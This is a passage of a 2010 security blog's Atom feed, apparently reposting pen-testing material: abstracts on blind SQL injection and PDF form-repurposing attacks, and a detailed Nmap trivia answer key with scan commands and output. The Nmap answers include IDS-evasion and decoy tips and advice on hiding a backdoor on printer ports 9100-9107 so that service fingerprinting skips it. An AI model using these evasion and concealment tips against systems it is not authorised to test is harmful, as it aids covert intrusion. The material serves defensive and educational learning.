Pen Tester’s Guide to Testing Flash Applications'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/7492719155683825114/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=7492719155683825114&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/7492719155683825114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/7492719155683825114'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/lazy-pen-testers-guide-to-testing-flash.html' title='A Lazy Pen Tester’s Guide to Testing Flash Applications'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-1559407041399002107</id><published>2010-07-27T08:38:00.000-07:00</published><updated>2010-07-27T08:39:28.368-07:00</updated><title type='text'>methods-of-quick-exploitation-of-blind</title><content type='html'>SQL Injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit the discovered vulnerability using classic methods (e.g., union). Until recently, we had to use boring slow techniques of symbol exhaustion in such cases. But is there any need to apply an ineffective approach, while we have the DBMS error message?! It can be adapted for line-by-line reading of data from a database or a file system, and this technique will be as easy as the classic SQL Injection exploitation. It is foolish not to take advantage of such opportunity! In this paper, we will consider the methods that allow one to use the database error messages as containers for useful data&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-1559407041399002107?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf' title='methods-of-quick-exploitation-of-blind'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/1559407041399002107/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=1559407041399002107&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/1559407041399002107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/1559407041399002107'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/methods-of-quick-exploitation-of-blind.html' title='methods-of-quick-exploitation-of-blind'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-8440403370248525622</id><published>2010-07-27T08:35:00.000-07:00</published><updated>2010-07-27T08:36:49.391-07:00</updated><title type='text'>PDF Silent HTTP Form Repurposing Attacks</title><content type='html'>This paper sheds light on the modified approach to trigger web attacks through JavaScript protocol handler in the context of browser when a PDF is opened in it. As we have seen, the kind of security mechanism implemented by Adobe in order to remove the insecurities that originate directly from the standalone PDF document in order to circumvent cross domain access. The attack is targeted on the web applications that allow PDF documents to be uploaded on the web server. Due to ingrained security mechanism in PDF Reader, it is hard to launch certain attacks. But with this technique an attacker can steal generic information from website by executing the code directly in the context of the domain where it is uploaded. The attack surface can be diversified by randomizing the attack vector. On further analysis it has been observed that it is possible to trigger phishing attacks too. Successful attacks have been conducted on number of web applications mainly to extract information based on DOM objects. The paper exposes a differential behavior of Acro JS and Brower JavaScript. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf"&gt;PDF&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-8440403370248525622?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf' title='PDF Silent HTTP Form Repurposing Attacks'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/8440403370248525622/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=8440403370248525622&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/8440403370248525622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/8440403370248525622'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/pdf-silent-http-form-repurposing.html' title='PDF Silent HTTP Form Repurposing Attacks'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-1846043477457900545</id><published>2010-07-27T08:27:00.000-07:00</published><updated>2010-07-27T08:28:46.624-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='discovery scripts'/><title type='text'>NMAP Trivia ANSWERS: Mastering Network Mapping and Scanning</title><content type='html'>Three weeks ago I published the NMAP Trivia challenge. Thanks to all ISC readers that submitted their responses! A special mention goes to the winning entry from Jason DePriest, an extensive and elaborated submission, available here. Congratulations! The prize (technical book) is on his way! ;)&lt;br /&gt;&lt;br /&gt;Jon Kibler provided an in-progress nmap idea for a new features, a scan proxy engine equivalent to the FTP bounce scan to scan through HTTP or SOCKS.&lt;br /&gt;&lt;br /&gt;Now... it is time for the answers:&lt;br /&gt;&lt;br /&gt;1. What are the default target ports used by the current nmap version (4.76)? How can you change the target ports list? What (nmap) options can be used to speed up scans by reducing the number of target ports and still check (potentially) the most relevant ones? How can you force nmap to check all target ports?&lt;br /&gt;&lt;br /&gt;Fyodor performed a thorough port scan research this last summer to identify the most common ports available on the Internet [1]. The current nmap version scans by default the 1000 most popular ports. The popularity of each port is coded inside the nmap-services configuration file (by default under /usr/local/share/nmap).&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;unknown 4/tcp 0.000477&lt;br /&gt;rje 5/udp 0.000593 # Remote Job Entry&lt;br /&gt;unknown 6/tcp 0.000502&lt;br /&gt;echo 7/tcp 0.004855&lt;br /&gt;echo 7/udp 0.024679&lt;br /&gt;unknown 8/tcp 0.000013&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;Nmap provides an option for quick scans, "-F". It scans the 100 most popular ports, reducing the default load in one order of magnitude. Additionally, you can decide how many popular ports you want to scan through the "--top-ports N" option, where "N" is the top number of ports.&lt;br /&gt;&lt;br /&gt;# ./nmap -F scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:44 GMT&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;Not shown: 95 filtered ports&lt;br /&gt;PORT STATE SERVICE&lt;br /&gt;22/tcp open ssh&lt;br /&gt;25/tcp closed smtp&lt;br /&gt;53/tcp open domain&lt;br /&gt;80/tcp open http&lt;br /&gt;113/tcp closed auth&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds&lt;br /&gt;&lt;br /&gt;# ./nmap --top-ports 5 scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:44 GMT&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;PORT STATE SERVICE&lt;br /&gt;21/tcp filtered ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp filtered telnet&lt;br /&gt;80/tcp open http&lt;br /&gt;443/tcp filtered https&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds&lt;br /&gt;&lt;br /&gt;Finally, nmap allows you to define the specific set of ports to scan through the "-p" option, as in "-pT:22,80,443,U:53,69,514". All ports, including port 0, can be scanned by providing the "-p0-" option, meaning from 0 till the end of the range, that is, port 65535. You need to specify if they are TCP or UDP ports, or both ("-sSU").&lt;br /&gt;&lt;br /&gt;# nmap -p0- scanme.nmap.org&lt;br /&gt;&lt;br /&gt;[1] http://insecure.org/presentations/BHDC08/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. How can you force nmap to scan a specific list of 200 target ports, only relevant to you?&lt;br /&gt;&lt;br /&gt;If you don't want to scan the most popular ports, you can tell nmap what particular list of ports to scan by specifying them with the "-p" option, one by one or in ranges, like in "-p 20-23,25,80,443". Because this can be too tedious for long lists of ports, the recommended way is to copy and edit the "nmap-services" file and create a custom version containing your list of interesting ports. The new custom file can be referenced using the "--servicedb" (for individual files) or "--datadir" (for the configuration files directory) options, as in:&lt;br /&gt;&lt;br /&gt;# nmap --datadir ./myconfig scanme.nmap.org&lt;br /&gt;&lt;br /&gt;If your custom file contains more than 200 target services, then you can use the "--top-ports 200" option again. The specific file and directory search order followed by nmap is detailed on page 370 of the nmap book: http://nmap.org/book/data-files-replacing-data-files.html.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. What is the default port used by nmap for UDP ping discovery (-PU)? Why? If you don't know it from the top of your head ;), how can you easily identify this port without using other tools (such as a sniffer) or inspecting nmap's source code?&lt;br /&gt;&lt;br /&gt;By default, nmap sends an empty UDP packet to port UDP/31338 for the UDP ping discovery method ("-PU"). The reason is that there is a high chance this random high port is closed. This is the preferred state expected by nmap trying to elicit an ICMP port unreachable packet in return and, as a result, identify the existence of a new host. The port number is defined in nmap.h, specifically in the DEFAULT_UDP_PROBE_PORT_SPEC constant. Did you notice it is 31337 plus 1, the elite port (31337 in haxor speech) plus one.&lt;br /&gt;&lt;br /&gt;Currently, nmap provides the "--packet-trace" option to gather detailed information about the network traffic and individual packets sent and received during its operations. Effectively, this option acts as a built in sniffer, very useful to get details about what nmap is doing on the backstage.&lt;br /&gt;&lt;br /&gt;# nmap -PU --packet-trace scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:58 GMT&lt;br /&gt;SENT (0.6580s) UDP 192.168.166.166:59676 &gt; 64.13.134.52:31338 ttl=58 id=45958 iplen=28&lt;br /&gt;SENT (1.6560s) UDP 192.168.166.166:59677 &gt; 64.13.134.52:31338 ttl=59 id=46599 iplen=28&lt;br /&gt;Note: Host seems down. If it is really up, but blocking our ping probes, try -PN&lt;br /&gt;Nmap done: 1 IP address (0 hosts up) scanned in 2.68 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. When nmap is run, sometimes it is difficult to know what is going on the backstage. What two (nmap) options allow you to gather detailed but not overwhelming information about nmap's port scanning operations? What other extra (nmap) options are available for ultra detailed information?&lt;br /&gt;&lt;br /&gt;The first of the options has been mentioned and used on the previous question, "--packet-trace". It allows to get a tcpdump-like output about packets sent and received. Additionally, nmap provides the "--reason" option to display the reason why a port has been clasiffied on an specific state: open, closed, filtered, etc.&lt;br /&gt;&lt;br /&gt;# nmap -F -sSU --reason scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:00 GMT&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;Not shown: 99 open|filtered ports, 96 filtered ports&lt;br /&gt;Reason: 194 no-responses and 1 admin-prohibited&lt;br /&gt;PORT STATE SERVICE REASON&lt;br /&gt;22/tcp open ssh syn-ack&lt;br /&gt;25/tcp closed smtp reset&lt;br /&gt;53/tcp open domain syn-ack&lt;br /&gt;80/tcp open http syn-ack&lt;br /&gt;113/tcp closed auth reset&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds&lt;br /&gt;&lt;br /&gt;# nmap -F -sU --reason scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:02 GMT&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;Not shown: 99 open|filtered ports&lt;br /&gt;Reason: 99 no-responses&lt;br /&gt;PORT STATE SERVICE REASON&lt;br /&gt;520/udp filtered route admin-prohibited from 192.168.15.1&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds&lt;br /&gt;&lt;br /&gt;For those interested on gathering as much information as possible about nmap's operations, the "-v" verbosity option, or the "-dN" debugging option are available. These options specify nmap to be verbose (multiple verbosity levels are allowed), or the nmap debug level for troubleshooting purposes, where N can have a value between 1 and 9. Be careful when you use it! Try it and be ready for a Matrix-like output 8-)&lt;br /&gt;&lt;br /&gt;# nmap -p80 -sS -v scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:07 GMT&lt;br /&gt;Initiating Ping Scan at 11:07&lt;br /&gt;Scanning 64.13.134.52 [2 ports]&lt;br /&gt;Completed Ping Scan at 11:07, 0.24s elapsed (1 total hosts)&lt;br /&gt;Initiating Parallel DNS resolution of 1 host. at 11:07&lt;br /&gt;Completed Parallel DNS resolution of 1 host. at 11:07, 0.24s elapsed&lt;br /&gt;Initiating SYN Stealth Scan at 11:07&lt;br /&gt;Scanning scanme.nmap.org (64.13.134.52) [1 port]&lt;br /&gt;Discovered open port 80/tcp on 64.13.134.52&lt;br /&gt;Completed SYN Stealth Scan at 11:07, 0.26s elapsed (1 total ports)&lt;br /&gt;Host scanme.nmap.org (64.13.134.52) appears to be up ... good.&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;PORT STATE SERVICE&lt;br /&gt;80/tcp open http&lt;br /&gt;&lt;br /&gt;Read data files from: .&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds&lt;br /&gt;Raw packets sent: 3 (112B) | Rcvd: 2 (72B)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# nmap -p80 -sS -d1 scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:08 GMT&lt;br /&gt;--------------- Timing report ---------------&lt;br /&gt;...&lt;br /&gt;---------------------------------------------&lt;br /&gt;Initiating Ping Scan at 11:08&lt;br /&gt;Scanning 64.13.134.52 [2 ports]&lt;br /&gt;...&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds&lt;br /&gt;Raw packets sent: 3 (112B) | Rcvd: 2 (72B)&lt;br /&gt;&lt;br /&gt;Try it by your own! ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. What are the preferred (nmap) options to run a stealthy TCP port scan? Particularly, try to avoid detection from someone running a sniffer near the person running nmap and focus on the extra actions performed by the tool (assuming the packets required to complete the port scan are not detected)?&lt;br /&gt;&lt;br /&gt;Most current network IDS can detect the default packets generated by nmap when port scanning a target. We are assuming here these cannot be detected, so a stealthier scan can be launched by using the "-n" option (not used in any of the Nmap Trivia examples), that is, disable all reverse DNS resolution at the nmap level. Most Unix-based security tools provide this same option for the same purpose.&lt;br /&gt;&lt;br /&gt;# nmap -F -n scanme.nmap.org&lt;br /&gt;&lt;br /&gt;However, this way you lose the sometimes valuable DNS information. You can use the "--dns-servers" option to indicate the DNS recursive servers to use as DNS proxies when analyzing the target IP address.&lt;br /&gt;More stealthier details on answer number 12.&lt;br /&gt;&lt;br /&gt;6. Why port number 49152 is relevant to nmap?&lt;br /&gt;&lt;br /&gt;Port 49152 is the first of the ephemeral ports for dynamic usage based on IANA. However, the port assignment depends on the implementation of your tools or operating system. See http://www.iana.org/assignments/port-numbers:&lt;br /&gt;- The Well Known Ports are those from 0 through 1023&lt;br /&gt;- The Registered Ports are those from 1024 through 49151&lt;br /&gt;- The Dynamic and/or Private Ports are those from 49152 through 65535&lt;br /&gt;&lt;br /&gt;7. What is the only nmap TCP scan type that classifies the target ports as "unfiltered"? Why? What additional nmap scan type can be used to discern if those ports (previously identified as "unfiltered") are in an open or closed state?&lt;br /&gt;&lt;br /&gt;The only nmap scan type that can show a port in the "unfiltered" state is the TCP ACK scan, "-sA" option. The reason is because this scan cannot differentiate between an open and closed port, as a target hosts (if unfiltered) will always reply with a RST packet. This is the standard behaviour for a closed port, and is also standar for an open port for which there is not a previously established connection to map the ACK packet to. Therefore, nmap's ACK scan cannot be considered a port scan, as it cannot differentiate between port states, but a host discovery scan.&lt;br /&gt;&lt;br /&gt;The TCP Window scan, "-sW" option, is similar to the TCP ACK scan, but it can differentiate between open and closed ports is some scenarios.&lt;br /&gt;&lt;br /&gt;8. When (and it what nmap version) the default state for a non-responsive UDP port was changed on nmap (from "open" to "open|filtered")? Why?&lt;br /&gt;&lt;br /&gt;The default state for a non-responsive UDP port was changed (from "open" to "open|filtered") on nmap version v3.70 in 2004. The reason was accurancy, as extensive use of filtering devices by that time made filtered UDP ports always appear as open in previous nmap versions.&lt;br /&gt;&lt;br /&gt;9. What is the default scan type used by nmap when none is specified, as in "nmap -T4 scanme.nmap.org"? Is this always the default scan method? If not, what other scan method does nmap default to, under what conditions, and why?&lt;br /&gt;&lt;br /&gt;The current nmap version performs a TCP SYN scan ("-sS" option) by default when no scan type is specified. However, this is only the default behavior when nmap is launched as a privileged user (eg. root in Linux). The TCP connect scan, "-sT" option (connect() syscall), is used by default with non-privileged users as these cannot send raw packets (used by the SYN scan) or if there are IPv6 targets.&lt;br /&gt;&lt;br /&gt;# ./nmap -PN -p80,81 --packet-trace scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:22 GMT&lt;br /&gt;...&lt;br /&gt;SENT (0.3730s) TCP 192.168.166.166:56464 &gt; 64.13.134.52:80 S ttl=50 \&lt;br /&gt;id=8102 iplen=44 seq=1698869517 win=3072 &lt;br /&gt;SENT (0.3740s) TCP 192.168.166.166:56464 &gt; 64.13.134.52:81 S ttl=43 \&lt;br /&gt;id=48226 iplen=44 seq=1698869517 win=4096 &lt;br /&gt;RCVD (0.6120s) TCP 64.13.134.52:80 &gt; 192.168.166.166:56464 SA ttl=48 \&lt;br /&gt;id=0 iplen=44 seq=2849983456 win=5840 ack=1698869518 &lt;br /&gt;RCVD (1.9570s) TCP 64.13.134.52:80 &gt; 192.168.166.166:40972 SA ttl=48 \&lt;br /&gt;id=0 iplen=44 seq=2805666242 win=5840 ack=2103880733 &lt;br /&gt;SENT (2.5730s) TCP 192.168.166.166:56465 &gt; 64.13.134.52:81 S ttl=55 \&lt;br /&gt;id=14744 iplen=44 seq=1698935052 win=4096 &lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;PORT STATE SERVICE&lt;br /&gt;80/tcp open http&lt;br /&gt;81/tcp filtered hosts2-ns&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds&lt;br /&gt;&lt;br /&gt;$ ./nmap -PN -p80,81 --packet-trace scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:25 GMT&lt;br /&gt;...&lt;br /&gt;CONN (0.1290s) TCP localhost &gt; 64.13.134.52:80 =&gt; Operation now in progress&lt;br /&gt;CONN (0.1290s) TCP localhost &gt; 64.13.134.52:81 =&gt; Operation now in progress&lt;br /&gt;CONN (2.3510s) TCP localhost &gt; 64.13.134.52:81 =&gt; Operation now in progress&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;PORT STATE SERVICE&lt;br /&gt;80/tcp open http&lt;br /&gt;81/tcp filtered hosts2-ns&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 3.57 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10. What nmap features (can make or) make use of nmap's raw packet capabilities? What nmap features rely on the OS TCP/IP stack instead?&lt;br /&gt;&lt;br /&gt;Nmap makes use of the raw packet capabilities by default, "--send-eth" option, as demonstrated in the previous question for some features, such as TCP and UDP port scans launched by privileged users (except for the connect scan and the FTP bounce scan), or fragmentation probes. Other features like the Nmap Scripting Engine and version detection relay on the OS TCP/IP stack.&lt;br /&gt;&lt;br /&gt;11. Nmap's performance has been sometimes criticized versus other network scanners. What (nmap) options can you use to convert nmap into a faster, stateless scanner for high performance but less accurate results?&lt;br /&gt;&lt;br /&gt;If the congestion controls and packet loss detection algorithms are omitted, a scanner will run faster. Nmap can achieve a similar behaviour as stateless scanners, no code to track and retransmit probes, using the following options:&lt;br /&gt;&lt;br /&gt;# ./nmap --min-rate 1000 --max-retries 0 ...&lt;br /&gt;&lt;br /&gt;These indicate nmap to send at least 1000 packets per second (if your system or wire can) and disable retransmission of timed-out probes. However, take into account the impact this might have in the accurancy of the results.&lt;br /&gt;&lt;br /&gt;# ./nmap -PN -n --min-rate 1000 --max-retries 0 -F scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 12:08 GMT&lt;br /&gt;Warning: Giving up on port early because retransmission cap hit.&lt;br /&gt;Interesting ports on 64.13.134.52:&lt;br /&gt;Not shown: 95 filtered ports&lt;br /&gt;PORT STATE SERVICE&lt;br /&gt;22/tcp open ssh&lt;br /&gt;25/tcp closed smtp&lt;br /&gt;53/tcp open domain&lt;br /&gt;80/tcp open http&lt;br /&gt;113/tcp closed auth&lt;br /&gt;&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds&lt;br /&gt;&lt;br /&gt;12. What relevant nmap feature does not allow an attacker to use the decoy functionality (-D) and might reveal his real IP address?&lt;br /&gt;&lt;br /&gt;Apart from the previously mentioned "-n" option to run stealthier scans and avoid IDS detection, there are other related options, such as "--data-length", to change the default empty packet used for some probes, "--ttl" to modify the TTL on the sent packets, timing options ("-T"), "--randomize-hosts" to change the order the target hosts are scanned, or "-D" to launch a decoy scan (simulate the scan is coming from multiple hosts).&lt;br /&gt;&lt;br /&gt;Decoys are used in the ping discovery, port scanning, and remote OS detection phases. However, this feature does not apply when DNS queries or service version detection ("-sV" or "-A") are used, being the source IP address disclosed.&lt;br /&gt;&lt;br /&gt;13. What are the (nmap) options you can use to identify all the steps followed by nmap to fingerprint and identify the Web server version running on scanme.nmap.org?&lt;br /&gt;&lt;br /&gt;# ./nmap -sSV -p80 --version-trace scanme.nmap.org&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 12:17 GMT&lt;br /&gt;...&lt;br /&gt;SCRIPT ENGINE: Initiating script scanning.&lt;br /&gt;SCRIPT ENGINE: Script scanning scanme.nmap.org (64.13.134.52).&lt;br /&gt;SCRIPT ENGINE: Initialized 4 rules&lt;br /&gt;SCRIPT ENGINE: Matching rules.&lt;br /&gt;SCRIPT ENGINE: Running scripts.&lt;br /&gt;SCRIPT ENGINE: Script scanning completed.&lt;br /&gt;Scanned at 2009-01-21 12:17:57 GMT for 8s&lt;br /&gt;Interesting ports on scanme.nmap.org (64.13.134.52):&lt;br /&gt;PORT STATE SERVICE VERSION&lt;br /&gt;80/tcp open http Apache httpd 2.2.2 ((Fedora))&lt;br /&gt;Final times for host: srtt: 238764 rttvar: 179294 to: 955940&lt;br /&gt;&lt;br /&gt;Read from .: nmap-rpc nmap-service-probes nmap-services.&lt;br /&gt;Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .&lt;br /&gt;Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds&lt;br /&gt;&lt;br /&gt;The "-sSV" option allows you to focus on a TCP scan type (SYN scan in this case, "-sS"), and fingerprint the service ("-sV"). In order to just target the web server (supposing HTTP (TCP/80) is the target port, and not HTTPS (TCP/443)), the "-p80" option must be used.&lt;br /&gt;&lt;br /&gt;The "--version-trace" option is similar to the "--packet-trace" option, but instead of dumping the network traffic, it dumps all the actions or steps performed by nmap during the execution of the service fingerprinting modules. Additionally, other debug options ("-dN") can be added to gather further details.&lt;br /&gt;&lt;br /&gt;14. As an attacker, what port number would you select to hide a listening service backdoor trying to avoid an accurate detection by nmap's default aggressive fingerprinting tests? Would it be TCP or UDP? Why? What additional (nmap) options do you need to specify as a defender to fingerprint the hidden service backdoor?&lt;br /&gt;&lt;br /&gt;If a port in the range of TCP/9100-9107 is selected for a backdoor, due to the fact these are common ports for printer services, nmap won`t fingerprint the service. These ports are excluded by default on the service fingerprinting tests ("-sV") or aggressive scan options ("-A") trying to save the planet, trees and forests specifically, by not making printers dump dozens of pages full of nmap probes and garbage as a result of the stimulous received from the scan.&lt;br /&gt;&lt;br /&gt;If you want to enable service fingerprinting on all ports, there are two options. The "--allports" option can be specified, as in "nmap -A --allports", or the nmap-service-probes file can be modified to enable these ports by removing the "Exclude" directive.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;15. What is the language used to write NSE scripts, and what two other famous open-source security tools/projects currently use the same language?&lt;br /&gt;&lt;br /&gt;Nmap uses the LUA (www.lua.org) programming language. LUA (pronounced LOO-ah) means "Moon" in Portuguese, or "Luna" in Spanish ;) Other famous open-source security tools, like Wireshark and Snort use LUA to extend their capabilities.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;16. What Linux/Windows command can you use to identify the list of NSE scripts that belong to the "discovery" category and will execute when this set of scripts is selected with the "--script discovery" nmap option?&lt;br /&gt;&lt;br /&gt;By default, NSE scripts are available under the "scripts" directory (however, nmap searched in other locations too: --datadir, $NAMPDIR, etc), with the ".nse" file extension. All NSE scripts belong to one or more categories, define inside the script, and indexed by the scripts/script.db database (if updated through the "--script-updatedb" option).&lt;br /&gt;&lt;br /&gt;Therefore a couple of options to search for discovery scripts in Linux are:&lt;br /&gt;&lt;br /&gt;# grep discovery scripts/*.nse&lt;br /&gt;scripts/ASN.nse:categories = {"discovery", "external"}&lt;br /&gt;scripts/HTTP_open_proxy.nse:categories = {"default", "discovery", "external", "intrusive"}&lt;br /&gt;scripts/HTTPtrace.nse:categories = {"discovery"}&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;# grep discovery scripts/script.db&lt;br /&gt;Entry{ category = "discovery", filename = "HTTPtrace.nse" }&lt;br /&gt;Entry{ category = "discovery", filename = "rpcinfo.nse" }&lt;br /&gt;Entry{ category = "discovery", filename = "SMTPcommands.nse" }&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;You can perform a similar search in Windows using the built-in search capabilities (searching by "A word or phrase in the file" to look inside the directory) or the find or findstr commands (to search within a file or set of files).&lt;br /&gt;&lt;br /&gt;17. How can you know the specific arguments accepted by a specific NSE script, such as those accepted by the whois.nse script?&lt;br /&gt;&lt;br /&gt;In order to identify the arguments that can be passed through the "--script-args" option to a NSE script, eg. whois.nse, check the documentation or code within the script file. If it is properly documented, search by "-- @args" to go to the arguments documentation section.&lt;br /&gt;&lt;br /&gt;Finally, a couple of extra questions for the real nmap-lovers:&lt;br /&gt;&lt;br /&gt;How can you get in real-time the open ports discoverd by nmap before the final report is displayed?&lt;br /&gt;What happens when you run nmap in verbose mode on September 1?&lt;br /&gt;That's all folks! Happy nmap discovery and scanning!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-1846043477457900545?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.radajo.com/2009/01/nmap-trivia-answers-mastering-network.html' title='NMAP Trivia ANSWERS: Mastering Network Mapping and Scanning'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/1846043477457900545/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=1846043477457900545&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/1846043477457900545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/1846043477457900545'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/nmap-trivia-answers-mastering-network.html' title='NMAP Trivia ANSWERS: Mastering Network Mapping and Scanning'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-6835438685092562573</id><published>2010-07-27T08:15:00.000-07:00</published><updated>2010-07-27T08:26:27.566-07:00</updated><title type='text'>Certificate-based Client Authentication in WebApp PenTests</title><content type='html'>http://www.radajo.com/2009/10/sqlninja-metasploit-demo.html&lt;br /&gt;One of the key attack tools to perform effective Web Application Penetration Tests (WebApp PenTest) are interception proxies, allowing the analyst to inspect and modify all the requests and responses exchanged between the web browser and the target web application. Some of the most popular ones are developed in Java, such as Paros, Webscarab or Burp, being the Java platform a prerequisite to run.&lt;br /&gt;&lt;br /&gt;Sun/Oracle has recently released new updates for Java: Java 6 Update 19 on March 2010, fixing 27 security issues, and Java 6 Update 20 on April 2010, including a couple of fixes. If you have 